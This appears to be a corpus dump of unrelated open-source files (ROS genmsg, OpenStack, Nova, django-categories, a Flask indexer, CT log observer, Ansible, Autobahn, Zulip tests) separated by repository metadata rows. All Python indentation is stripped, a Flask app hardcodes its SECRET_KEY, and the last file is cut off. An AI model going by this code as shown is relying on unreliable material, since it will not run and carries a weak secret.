# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
## ROS Message generatation
##
##
import sys
import os
import em
import genmsg.command_line
import genmsg.msgs
import genmsg.msg_loader
import genmsg.gentools
# generate msg or srv files from a template file
# template_map of the form { 'template_file':'output_file'} output_file can contain @NAME@ which will be replaced by the message/service name
def _generate_from_spec(input_file, output_dir, template_dir, msg_context, spec, template_map, search_path):
md5sum = genmsg.gentools.compute_md5(msg_context, spec)
# precompute msg definition once
if isinstance(spec, genmsg.msgs.MsgSpec):
msg_definition = genmsg.gentools.compute_full_text(msg_context, spec)
# Loop over all files to generate
for template_file_name, output_file_name in template_map.items():
template_file = os.path.join(template_dir, template_file_name)
output_file = os.path.join(output_dir, output_file_name.replace("@NAME@", spec.short_name))
#print "generate_from_template %s %s %s" % (input_file, template_file, output_file)
ofile = open(output_file, 'w') #todo try
# Set dictionary for the generator interpreter
g = {
"file_name_in": input_file,
"spec": spec,
"md5sum": md5sum,
"search_path": search_path,
"msg_context": msg_context
}
if isinstance(spec, genmsg.msgs.MsgSpec):
g['msg_definition'] = msg_definition
# todo, reuse interpreter
interpreter = em.Interpreter(output=ofile, globals=g, options={em.RAW_OPT:True,em.BUFFERED_OPT:True})
if not os.path.isfile(template_file):
ofile.close()
os.remove(output_file)
raise RuntimeError("Template file %s not found in template dir %s" % (template_file_name, template_dir))
interpreter.file(open(template_file)) #todo try
interpreter.shutdown()
def _generate_msg_from_file(input_file, output_dir, template_dir, search_path, package_name, msg_template_dict):
# Read MsgSpec from .msg file
msg_context = genmsg.msg_loader.MsgContext.create_default()
full_type_name = genmsg.gentools.compute_full_type_name(package_name, os.path.basename(input_file))
spec = genmsg.msg_loader.load_msg_from_file(msg_context, input_file, full_type_name)
# Load the dependencies
genmsg.msg_loader.load_depends(msg_context, spec, search_path)
# Generate the language dependent msg file
_generate_from_spec(input_file,
output_dir,
template_dir,
msg_context,
spec,
msg_template_dict,
search_path)
def _generate_srv_from_file(input_file, output_dir, template_dir, search_path, package_name, srv_template_dict, msg_template_dict):
# Read MsgSpec from .srv.file
msg_context = genmsg.msg_loader.MsgContext.create_default()
full_type_name = genmsg.gentools.compute_full_type_name(package_name, os.path.basename(input_file))
spec = genmsg.msg_loader.load_srv_from_file(msg_context, input_file, full_type_name)
# Load the dependencies
genmsg.msg_loader.load_depends(msg_context, spec, search_path)
# Generate the language dependent srv file
_generate_from_spec(input_file,
output_dir,
template_dir,
msg_context,
spec,
srv_template_dict,
search_path)
# Generate the language dependent msg file for the srv request
_generate_from_spec(input_file,
output_dir,
template_dir,
msg_context,
spec.request,
msg_template_dict,
search_path)
# Generate the language dependent msg file for the srv response
_generate_from_spec(input_file,
output_dir,
template_dir,
msg_context,
spec.response,
msg_template_dict,
search_path)
# uniform interface for genering either srv or msg files
def generate_from_file(input_file, package_name, output_dir, template_dir, include_path, msg_template_dict, srv_template_dict):
# Normalize paths
input_file = os.path.abspath(input_file)
output_dir = os.path.abspath(output_dir)
# Create output dir
try:
os.makedirs(output_dir)
except OSError as e:
if e.errno != 17: # ignore file exists error
raise
# Parse include path dictionary
if( include_path ):
search_path = genmsg.command_line.includepath_to_dict(include_path)
else:
search_path = {}
# Generate the file(s)
if input_file.endswith(".msg"):
_generate_msg_from_file(input_file, output_dir, template_dir, search_path, package_name, msg_template_dict)
elif input_file.endswith(".srv"):
_generate_srv_from_file(input_file, output_dir, template_dir, search_path, package_name, srv_template_dict, msg_template_dict)
else:
assert False, "Uknown file extension for %s"%input_file
def generate_module(package_name, output_dir, template_dir, template_dict):
# Locate generate msg files
files = os.listdir(output_dir)
# Loop over all files to generate
for template_file_name, output_file_name in template_dict.items():
template_file = os.path.join(template_dir, template_file_name)
output_file = os.path.join(output_dir, output_file_name)
ofile = open(output_file, 'w') #todo try
# Set dictionary for the generator intepreter
g = dict(files=files,
package=package_name)
# todo, reuse interpreter
interpreter = em.Interpreter(output=ofile, options={em.RAW_OPT:True,em.BUFFERED_OPT:True})
interpreter.updateGlobals(g)
if not os.path.isfile(template_file):
ofile.close()
os.remove(output_file)
raise RuntimeError("Template file %s not found in template dir %s" % (template_file_name, template_dir))
interpreter.file(open(template_file)) #todo try
interpreter.shutdown()
# Uniform interface to support the standard command line options
def generate_from_command_line_options(argv, msg_template_dict, srv_template_dict, module_template_dict = {}):
from optparse import OptionParser
parser = OptionParser("[options] <srv file>")
parser.add_option("-p", dest='package',
help="ros package the generated msg/srv files belongs to")
parser.add_option("-o", dest='outdir',
help="directory in which to place output files")
parser.add_option("-I", dest='includepath',
help="include path to search for messages",
action="append")
parser.add_option("-m", dest='module',
help="write the module file",
action='store_true', default=False)
parser.add_option("-e", dest='emdir',
help="directory containing template files",
default=sys.path[0])
(options, argv) = parser.parse_args(argv)
if( not options.package or not options.outdir or not options.emdir):
parser.print_help()
exit(-1)
if( options.module ):
generate_module(options.package, options.outdir, options.emdir, module_template_dict)
else:
if len(argv) > 1:
generate_from_file(argv[1], options.package, options.outdir, options.emdir, options.includepath, msg_template_dict, srv_template_dict)
else:
parser.print_help()
exit(-1)
| gpl-3.0 |
NeCTAR-RC/designate | tools/install_venv_common.py | 10 | 7888 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 OpenStack Foundation
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Provides methods needed by installation script for OpenStack development
virtual environments.
Since this script is used to bootstrap a virtualenv from the system's Python
environment, it should be kept strictly compatible with Python 2.6.
Synced in from openstack-common
"""
from __future__ import print_function
import optparse
import os
import subprocess
import sys
class InstallVenv(object):
def __init__(self, root, venv, pip_requires, test_requires, py_version,
project):
self.root = root
self.venv = venv
self.pip_requires = pip_requires
self.test_requires = test_requires
self.py_version = py_version
self.project = project
def die(self, message, *args):
print(message % args, file=sys.stderr)
sys.exit(1)
def check_python_version(self):
if sys.version_info < (2, 6):
self.die("Need Python Version >= 2.6")
def run_command_with_code(self, cmd, redirect_output=True,
check_exit_code=True):
"""Runs a command in an out-of-process shell.
Returns the output of that command. Working directory is self.root.
"""
if redirect_output:
stdout = subprocess.PIPE
else:
stdout = None
proc = subprocess.Popen(cmd, cwd=self.root, stdout=stdout)
output = proc.communicate()[0]
if check_exit_code and proc.returncode != 0:
self.die('Command "%s" failed.\n%s', ' '.join(cmd), output)
return (output, proc.returncode)
def run_command(self, cmd, redirect_output=True, check_exit_code=True):
return self.run_command_with_code(cmd, redirect_output,
check_exit_code)[0]
def get_distro(self):
if (os.path.exists('/etc/fedora-release') or
os.path.exists('/etc/redhat-release')):
return Fedora(self.root, self.venv, self.pip_requires,
self.test_requires, self.py_version, self.project)
else:
return Distro(self.root, self.venv, self.pip_requires,
self.test_requires, self.py_version, self.project)
def check_dependencies(self):
self.get_distro().install_virtualenv()
def create_virtualenv(self, no_site_packages=True):
"""Creates the virtual environment and installs PIP.
Creates the virtual environment and installs PIP only into the
virtual environment.
"""
if not os.path.isdir(self.venv):
print('Creating venv...', end=' ')
if no_site_packages:
self.run_command(['virtualenv', '-q', '--no-site-packages',
self.venv])
else:
self.run_command(['virtualenv', '-q', self.venv])
print('done.')
print('Installing pip in venv...', end=' ')
if not self.run_command(['tools/with_venv.sh', 'easy_install',
'pip>1.0']).strip():
self.die("Failed to install pip.")
print('done.')
else:
print("venv already exists...")
pass
def pip_install(self, *args):
self.run_command(['tools/with_venv.sh',
'pip', 'install', '--upgrade'] + list(args),
redirect_output=False)
def install_dependencies(self):
print('Installing dependencies with pip (this can take a while)...')
# First things first, make sure our venv has the latest pip and
# distribute.
# NOTE: we keep pip at version 1.1 since the most recent version causes
# the .venv creation to fail. See:
# https://bugs.launchpad.net/nova/+bug/1047120
self.pip_install('pip==1.1')
self.pip_install('distribute')
# Install greenlet by hand - just listing it in the requires file does
# not
# get it installed in the right order
self.pip_install('greenlet')
self.pip_install('-r', self.pip_requires)
self.pip_install('-r', self.test_requires)
def post_process(self):
self.get_distro().post_process()
def parse_args(self, argv):
"""Parses command-line arguments."""
parser = optparse.OptionParser()
parser.add_option('-n', '--no-site-packages',
action='store_true',
help="Do not inherit packages from global Python "
"install")
return parser.parse_args(argv[1:])[0]
class Distro(InstallVenv):
def check_cmd(self, cmd):
return bool(self.run_command(['which', cmd],
check_exit_code=False).strip())
def install_virtualenv(self):
if self.check_cmd('virtualenv'):
return
if self.check_cmd('easy_install'):
print('Installing virtualenv via easy_install...', end=' ')
if self.run_command(['easy_install', 'virtualenv']):
print('Succeeded')
return
else:
print('Failed')
self.die('ERROR: virtualenv not found.\n\n%s development'
' requires virtualenv, please install it using your'
' favorite package management tool' % self.project)
def post_process(self):
"""Any distribution-specific post-processing gets done here.
In particular, this is useful for applying patches to code inside
the venv.
"""
pass
class Fedora(Distro):
"""This covers all Fedora-based distributions.
Includes: Fedora, RHEL, CentOS, Scientific Linux
"""
def check_pkg(self, pkg):
return self.run_command_with_code(['rpm', '-q', pkg],
check_exit_code=False)[1] == 0
def apply_patch(self, originalfile, patchfile):
self.run_command(['patch', '-N', originalfile, patchfile],
check_exit_code=False)
def install_virtualenv(self):
if self.check_cmd('virtualenv'):
return
if not self.check_pkg('python-virtualenv'):
self.die("Please install 'python-virtualenv'.")
super(Fedora, self).install_virtualenv()
def post_process(self):
"""Workaround for a bug in eventlet.
This currently affects RHEL6.1, but the fix can safely be
applied to all RHEL and Fedora distributions.
This can be removed when the fix is applied upstream.
Nova: https://bugs.launchpad.net/nova/+bug/884915
Upstream: https://bitbucket.org/eventlet/eventlet/issue/89
RHEL: https://bugzilla.redhat.com/958868
"""
# Install "patch" program if it's not there
if not self.check_pkg('patch'):
self.die("Please install 'patch'.")
# Apply the eventlet patch
self.apply_patch(os.path.join(self.venv, 'lib', self.py_version,
'site-packages',
'eventlet/green/subprocess.py'),
'contrib/redhat-eventlet.patch')
| apache-2.0 |
fajoy/nova | nova/virt/xenapi/network_utils.py | 25 | 1869 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2010 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Helper methods for operations related to the management of network
records and their attributes like bridges, PIFs, QoS, as well as
their lookup functions.
"""
def find_network_with_name_label(session, name_label):
networks = session.call_xenapi('network.get_by_name_label', name_label)
if len(networks) == 1:
return networks[0]
elif len(networks) > 1:
raise Exception(_('Found non-unique network for name_label %s') %
name_label)
else:
return None
def find_network_with_bridge(session, bridge):
"""
Return the network on which the bridge is attached, if found.
The bridge is defined in the nova db and can be found either in the
'bridge' or 'name_label' fields of the XenAPI network record.
"""
expr = ('field "name__label" = "%s" or field "bridge" = "%s"' %
(bridge, bridge))
networks = session.call_xenapi('network.get_all_records_where', expr)
if len(networks) == 1:
return networks.keys()[0]
elif len(networks) > 1:
raise Exception(_('Found non-unique network for bridge %s') % bridge)
else:
raise Exception(_('Found no network for bridge %s') % bridge)
| apache-2.0 |
Govexec/django-categories | categories/base.py | 1 | 7455 | """
This is the base class on which to build a hierarchical category-like model
with customizable metadata and its own name space.
"""
from django import forms
from django.contrib import admin
from django.contrib.sites.models import Site
from django.db import models
from django.template.defaultfilters import slugify
from django.utils.encoding import force_unicode
from django.utils.translation import ugettext_lazy as _
from mptt.models import MPTTModel
from mptt.fields import TreeForeignKey
from mptt.managers import TreeManager
from categories.editor.tree_editor import TreeEditor
from categories.querysets import CategoryQuerySet
from categories.settings import ALLOW_SLUG_CHANGE, SLUG_TRANSLITERATOR
class CategoryManager(models.Manager):
def get_query_set(self):
return CategoryQuerySet(self.model)
def active(self):
"""
Only categories that are active
"""
return self.get_query_set().active()
def govexec(self):
return self.get_query_set().govexec()
class CategoryBase(MPTTModel):
"""
This base model includes the absolute bare bones fields and methods. One
could simply subclass this model and do nothing else and it should work.
"""
parent = TreeForeignKey('self',
blank=True,
null=True,
related_name='children',
verbose_name=_('parent'))
name = models.CharField(max_length=100, verbose_name=_('name'))
slug = models.SlugField(verbose_name=_('slug'))
active = models.BooleanField(default=True, verbose_name=_('active'))
unicode_name = models.CharField(
blank=True,
null=True,
default=None,
max_length=255)
# TODO: I would like to make this required if we can eliminate edge cases
site = models.ForeignKey(Site, blank=True, null=True)
objects = CategoryManager()
tree = TreeManager()
def save(self, *args, **kwargs):
"""
While you can activate an item without activating its descendants,
It doesn't make sense that you can deactivate an item and have its
decendants remain active.
"""
if not self.slug:
self.slug = slugify(SLUG_TRANSLITERATOR(self.name))[:50]
super(CategoryBase, self).save(*args, **kwargs)
if not self.active:
for item in self.get_descendants():
if item.active != self.active:
item.active = self.active
item.save()
def __unicode__(self):
if hasattr(self, 'unicode_name') and self.unicode_name:
return self.unicode_name
return self.generate_unicode_name()
def generate_unicode_name(self):
ancestors = self.get_ancestors()
# remove top-level category from display
ancestors_list = list(ancestors)
# added hack to show "magazine" in the section title
if len(ancestors_list) > 0 and not ancestors_list[0].slug == "magazine" and not ancestors_list[0].slug == "nextgov-categories":
del ancestors_list[0]
return ' > '.join([force_unicode(i.name) for i in ancestors] + [self.name, ])
def all_categories(self, delimiter='::'):
if hasattr(self, '__all_categories'):
return self.__all_categories
self.__all_categories = []
for category in self.get_ancestors(include_self=True):
tmp = []
for existing in self.__all_categories:
tmp.append(existing)
tmp.append(category.name)
self.__all_categories.append(delimiter.join(tmp))
return self.__all_categories
class Meta:
abstract = True
unique_together = (('parent', 'name'),('tree_id', 'slug'),)
ordering = ('tree_id', 'lft')
class MPTTMeta:
order_insertion_by = 'name'
class CategoryBaseAdminForm(forms.ModelForm):
def clean_slug(self):
if self.instance is None or not ALLOW_SLUG_CHANGE:
self.cleaned_data['slug'] = slugify(self.cleaned_data['name'])
return self.cleaned_data['slug'][:50]
def clean(self):
super(CategoryBaseAdminForm, self).clean()
if not self.is_valid():
return self.cleaned_data
opts = self._meta
# Validate slug (no duplicate slugs within same tree_id)
kwargs = {}
this_tree_slugs = []
if self.cleaned_data.get('parent', None) is None:
# This is a top level category, so its tree_id cannot be checked
pass
else:
# Retrieve all other slugs in the same tree (using the tree_id of the parent category)
parent_tree_id = int(self.cleaned_data['parent'].tree_id)
this_tree_slugs = [c['slug'] for c in opts.model.objects.filter(
tree_id=parent_tree_id).values('id', 'slug'
) if c['id'] != self.instance.id]
# Raise error if any other slugs in the same tree match the new category slug
if self.cleaned_data['slug'] in this_tree_slugs:
raise forms.ValidationError(_('The slug must be unique among '
' items in the same tree.'))
# Validate Category Parent
# Make sure the category doesn't set itself or any of its children as
# its parent.
decendant_ids = self.instance.get_descendants().values_list('id', flat=True)
if self.cleaned_data.get('parent', None) is None or self.instance.id is None:
return self.cleaned_data
elif self.cleaned_data['parent'].id == self.instance.id:
raise forms.ValidationError(_("You can't set the parent of the "
"item to itself."))
elif self.cleaned_data['parent'].id in decendant_ids:
raise forms.ValidationError(_("You can't set the parent of the "
"item to a descendant."))
return self.cleaned_data
class CategoryBaseAdmin(TreeEditor, admin.ModelAdmin):
form = CategoryBaseAdminForm
list_display = ('name', 'active')
search_fields = ('name',)
prepopulated_fields = {'slug': ('name',)}
actions = ['activate', 'deactivate']
def get_actions(self, request):
actions = super(CategoryBaseAdmin, self).get_actions(request)
if 'delete_selected' in actions:
del actions['delete_selected']
return actions
def deactivate(self, request, queryset):
"""
Set active to False for selected items
"""
selected_cats = self.model.objects.filter(
pk__in=[int(x) for x in request.POST.getlist('_selected_action')])
for item in selected_cats:
if item.active:
item.active = False
item.save()
item.children.all().update(active=False)
deactivate.short_description = _('Deactivate selected categories and their children')
def activate(self, request, queryset):
"""
Set active to True for selected items
"""
selected_cats = self.model.objects.filter(
pk__in=[int(x) for x in request.POST.getlist('_selected_action')])
for item in selected_cats:
item.active = True
item.save()
item.children.all().update(active=True)
activate.short_description = _('Activate selected categories and their children')
| apache-2.0 |
nkcr/WebIndex | app/webstart.py | 1 | 3546 | '''This module provides a minimalist interface using Flask webserver.
Author: Noémien Kocher
Licence: MIT
Date: july 2016
'''
from flask import Flask, render_template, flash, request, redirect, url_for
from werkzeug.utils import secure_filename
import os, shutil
import webindex as wi
app = Flask(__name__)
UPLOAD_FOLDER = 'static/uploads' # default uplad folder
ALLOWED_EXTENSIONS = set(['html']) # file extension allowed
MAX_HIST = 100 # default number of keywords to display
# Set Flask variables
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['SECRET_KEY'] = 'dyf45hmlg350xykfh590ahfgsnek692d'
app.config['DEFAULT_QUANTITY'] = 100
def display_filter(s):
'''This is a jinja filter. It returns a value for the histogram.
'''
res = round(s,2)
if(res > MAX_HIST):
return MAX_HIST
return round(s,2)
app.jinja_env.filters['hist'] = display_filter
def cut_filter(s):
'''This is a jinja filter. It removes extra digits on a float
'''
return round(s,2)
app.jinja_env.filters['cut'] = cut_filter
def allowed_file(filename):
'''Check if a filename has the good extension (ie .html)
'''
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
def clean_folder(path):
'''Removes the content of a folder.
'''
for the_file in os.listdir(path):
file_path = os.path.join(path, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
#elif os.path.isdir(file_path): shutil.rmtree(file_path)
except Exception as e:
print(e)
@app.route('/', methods=['GET', 'POST'])
def index():
'''This is our main and only entry. It can display keywords based
on data found in 'data' folder or read html files from a folder and
creating the datastructures that will be saved in 'data' folder.
'''
webindex = wi.Webindex()
# Quantity param
quantity = request.args.get("quantity")
if(quantity is None):
quantity = app.config['DEFAULT_QUANTITY']
else:
quantity = int(quantity)
# bias param
if(request.args.get("word") is not None and
request.args.get("bias") is not None):
try:
webindex.bias(request.args.get("word"), float(request.args.get("bias")))
except BaseException as e:
flash("Failed to bias. ", str(e))
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
files = request.files.getlist("file")
# if user does not select file, browser also
# submit a empty part without filename
if not files:
flash('No selected files')
return redirect(request.url)
clean_folder(app.config['UPLOAD_FOLDER'])
for file in files:
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)
file.save(filepath)
webindex.handlefile(filepath)
else:
flash('Found unallowed file extension: ' + file.filename)
best = webindex.mostranked(quantity)
webindex.saveii()
webindex.saverepo()
else:
best = webindex.read_mostranked(quantity)
words = webindex.get_words()
return render_template('index.html', best=best, words=words)
| mit |
AlCutter/certificate-transparency | python/utilities/logobserver/logobserver.py | 7 | 2496 | #!/usr/bin/env python
import gflags
from google.protobuf import text_format
import logging
import os
import sys
import requests
from ct.client.db import sqlite_connection as sqlitecon
from ct.client import prober
from ct.client.db import sqlite_log_db
from ct.client.db import sqlite_temp_db
from ct.client.db import sqlite_cert_db
from ct.proto import client_pb2
FLAGS = gflags.FLAGS
gflags.DEFINE_string("ctlog_config", "ct/config/logs.config",
"Configuration file for log servers to monitor")
gflags.DEFINE_string("log_level", "WARNING", "logging level")
gflags.DEFINE_string("ct_sqlite_db", "/tmp/ct", "Location of the CT database")
gflags.DEFINE_string("ct_sqlite_temp_dir", "/tmp/ct_tmp", "Directory for "
"temporary CT data.")
gflags.DEFINE_string("ct_sqlite_cert_db", "/tmp/ct_cert", "Location of "
"certificate database.")
gflags.DEFINE_string("monitor_state_dir", "/tmp/ct_monitor",
"Filename prefix for monitor state. State for a given log "
"will be stored in a monitor_state_dir/log_id file")
def create_directory(directory):
if not os.path.exists(directory):
logging.info("Creating directory: %s" % directory)
os.makedirs(directory)
if __name__ == '__main__':
sys.argv = FLAGS(sys.argv)
logging.basicConfig(level=FLAGS.log_level)
create_directory(FLAGS.ct_sqlite_temp_dir)
create_directory(FLAGS.monitor_state_dir)
sqlite_log_db = sqlite_log_db.SQLiteLogDB(
sqlitecon.SQLiteConnectionManager(FLAGS.ct_sqlite_db))
sqlite_temp_db_factory = sqlite_temp_db.SQLiteTempDBFactory(
sqlitecon.SQLiteConnectionManager(FLAGS.ct_sqlite_temp_dir + "/meta"),
FLAGS.ct_sqlite_temp_dir)
sqlite_cert_db = sqlite_cert_db.SQLiteCertDB(
sqlitecon.SQLiteConnectionManager(FLAGS.ct_sqlite_cert_db))
ctlogs = client_pb2.CtLogs()
with open(FLAGS.ctlog_config, "r") as config:
log_config = config.read()
text_format.Merge(log_config, ctlogs)
ct_server_list = []
for log in ctlogs.ctlog:
sqlite_log_db.update_log(log)
ct_server_list.append(log.log_server)
prober_thread = prober.ProberThread(ctlogs, sqlite_log_db,
sqlite_cert_db,
sqlite_temp_db_factory,
FLAGS.monitor_state_dir)
prober_thread.start()
| apache-2.0 |
thaumos/ansible | test/units/utils/test_context_objects.py | 29 | 3536 | # -*- coding: utf-8 -*-
# Copyright: (c) 2018, Toshio Kuratomi <tkuratomi@ansible.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division)
__metaclass__ = type
try:
import argparse
except ImportError:
argparse = None
import optparse
import pytest
from ansible.module_utils.common.collections import ImmutableDict
from ansible.utils import context_objects as co
MAKE_IMMUTABLE_DATA = ((u'くらとみ', u'くらとみ'),
(42, 42),
({u'café': u'くらとみ'}, ImmutableDict({u'café': u'くらとみ'})),
([1, u'café', u'くらとみ'], (1, u'café', u'くらとみ')),
(set((1, u'café', u'くらとみ')), frozenset((1, u'café', u'くらとみ'))),
({u'café': [1, set(u'ñ')]},
ImmutableDict({u'café': (1, frozenset(u'ñ'))})),
([set((1, 2)), {u'くらとみ': 3}],
(frozenset((1, 2)), ImmutableDict({u'くらとみ': 3}))),
)
@pytest.mark.parametrize('data, expected', MAKE_IMMUTABLE_DATA)
def test_make_immutable(data, expected):
assert co._make_immutable(data) == expected
def test_cliargs_from_dict():
old_dict = {'tags': [u'production', u'webservers'],
'check_mode': True,
'start_at_task': u'Start with くらとみ'}
expected = frozenset((('tags', (u'production', u'webservers')),
('check_mode', True),
('start_at_task', u'Start with くらとみ')))
assert frozenset(co.CLIArgs(old_dict).items()) == expected
def test_cliargs():
class FakeOptions:
pass
options = FakeOptions()
options.tags = [u'production', u'webservers']
options.check_mode = True
options.start_at_task = u'Start with くらとみ'
expected = frozenset((('tags', (u'production', u'webservers')),
('check_mode', True),
('start_at_task', u'Start with くらとみ')))
assert frozenset(co.CLIArgs.from_options(options).items()) == expected
@pytest.mark.skipIf(argparse is None)
def test_cliargs_argparse():
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('integers', metavar='N', type=int, nargs='+',
help='an integer for the accumulator')
parser.add_argument('--sum', dest='accumulate', action='store_const',
const=sum, default=max,
help='sum the integers (default: find the max)')
args = parser.parse_args([u'--sum', u'1', u'2'])
expected = frozenset((('accumulate', sum), ('integers', (1, 2))))
assert frozenset(co.CLIArgs.from_options(args).items()) == expected
# Can get rid of this test when we port ansible.cli from optparse to argparse
def test_cliargs_optparse():
parser = optparse.OptionParser(description='Process some integers.')
parser.add_option('--sum', dest='accumulate', action='store_const',
const=sum, default=max,
help='sum the integers (default: find the max)')
opts, args = parser.parse_args([u'--sum', u'1', u'2'])
opts.integers = args
expected = frozenset((('accumulate', sum), ('integers', (u'1', u'2'))))
assert frozenset(co.CLIArgs.from_options(opts).items()) == expected
| gpl-3.0 |
oberstet/autobahn-python | autobahn/xbr/_eip712_market_create.py | 3 | 5917 | ###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Crossbar.io Technologies GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from typing import Optional
from ._eip712_base import sign, recover, is_address, is_bytes16, is_block_number, \
is_chain_id, is_eth_privkey, is_signature
def _create_eip712_market_create(chainId: int, verifyingContract: bytes, member: bytes, created: int,
marketId: bytes, coin: bytes, terms: str, meta: Optional[str], maker: bytes,
providerSecurity: int, consumerSecurity: int, marketFee: int) -> dict:
"""
:param chainId:
:param verifyingContract:
:param member:
:param created:
:param marketId:
:param coin:
:param terms:
:param meta:
:param maker:
:param providerSecurity:
:param consumerSecurity:
:param marketFee:
:return:
"""
assert is_chain_id(chainId)
assert is_address(verifyingContract)
assert is_address(member)
assert is_block_number(created)
assert is_bytes16(marketId)
assert is_address(coin)
assert type(terms) == str
assert meta is None or type(meta) == str
assert is_address(maker)
assert type(providerSecurity) == int
assert type(consumerSecurity) == int
assert type(marketFee) == int
# FIXME: add "coin" in below once we have done that in XBRTypes
data = {
'types': {
'EIP712Domain': [
{
'name': 'name',
'type': 'string'
},
{
'name': 'version',
'type': 'string'
},
],
'EIP712MarketCreate': [{
'name': 'chainId',
'type': 'uint256'
}, {
'name': 'verifyingContract',
'type': 'address'
}, {
'name': 'member',
'type': 'address'
}, {
'name': 'created',
'type': 'uint256'
}, {
'name': 'marketId',
'type': 'bytes16'
}, {
'name': 'coin',
'type': 'address'
}, {
'name': 'terms',
'type': 'string'
}, {
'name': 'meta',
'type': 'string'
}, {
'name': 'maker',
'type': 'address'
}, {
'name': 'marketFee',
'type': 'uint256',
}]
},
'primaryType': 'EIP712MarketCreate',
'domain': {
'name': 'XBR',
'version': '1',
},
'message': {
'chainId': chainId,
'verifyingContract': verifyingContract,
'member': member,
'created': created,
'marketId': marketId,
'coin': coin,
'terms': terms,
'meta': meta or '',
'maker': maker,
'marketFee': marketFee,
}
}
return data
def sign_eip712_market_create(eth_privkey: bytes, chainId: int, verifyingContract: bytes, member: bytes,
created: int, marketId: bytes, coin: bytes, terms: str, meta: str, maker: bytes,
providerSecurity: int, consumerSecurity: int, marketFee: int) -> bytes:
"""
:param eth_privkey: Ethereum address of buyer (a raw 20 bytes Ethereum address).
:type eth_privkey: bytes
:return: The signature according to EIP712 (32+32+1 raw bytes).
:rtype: bytes
"""
assert is_eth_privkey(eth_privkey)
data = _create_eip712_market_create(chainId, verifyingContract, member, created, marketId, coin, terms,
meta, maker, providerSecurity, consumerSecurity, marketFee)
return sign(eth_privkey, data)
def recover_eip712_market_create(chainId: int, verifyingContract: bytes, member: bytes, created: int,
marketId: bytes, coin: bytes, terms: str, meta: str, maker: bytes,
providerSecurity: int, consumerSecurity: int, marketFee: int,
signature: bytes) -> bytes:
"""
Recover the signer address the given EIP712 signature was signed with.
:return: The (computed) signer address the signature was signed with.
:rtype: bytes
"""
assert is_signature(signature)
data = _create_eip712_market_create(chainId, verifyingContract, member, created, marketId, coin, terms,
meta, maker, providerSecurity, consumerSecurity, marketFee)
return recover(data, signature)
| mit |
souravbadami/zulip | zerver/webhooks/appfollow/tests.py | 24 | 2160 | # -*- coding: utf-8 -*-
from typing import Text
from zerver.lib.test_classes import WebhookTestCase
from django.test import TestCase
from zerver.webhooks.appfollow.view import convert_markdown
class AppFollowHookTests(WebhookTestCase):
STREAM_NAME = 'appfollow'
URL_TEMPLATE = u"/api/v1/external/appfollow?stream={stream}&api_key={api_key}"
def test_sample(self):
# type: () -> None
expected_subject = "Webhook integration was successful."
expected_message = u"""Webhook integration was successful.
Test User / Acme (Google Play)"""
self.send_and_test_stream_message('sample', expected_subject, expected_message,
content_type="application/x-www-form-urlencoded")
def test_reviews(self):
# type: () -> None
expected_subject = "Acme - Group chat"
expected_message = u"""Acme - Group chat
App Store, Acme Technologies, Inc.
★★★★★ United States
**Great for Information Management**
Acme enables me to manage the flow of information quite well. I only wish I could create and edit my Acme Post files in the iOS app.
*by* **Mr RESOLUTIONARY** *for v3.9*
[Permalink](http://appfollow.io/permalink) · [Add tag](http://watch.appfollow.io/add_tag)"""
self.send_and_test_stream_message('review', expected_subject, expected_message,
content_type="application/x-www-form-urlencoded")
def get_body(self, fixture_name):
# type: (Text) -> Text
